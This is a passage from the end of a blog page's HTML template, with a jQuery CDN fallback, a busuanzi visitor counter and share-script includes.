    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "Dawn Yang"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


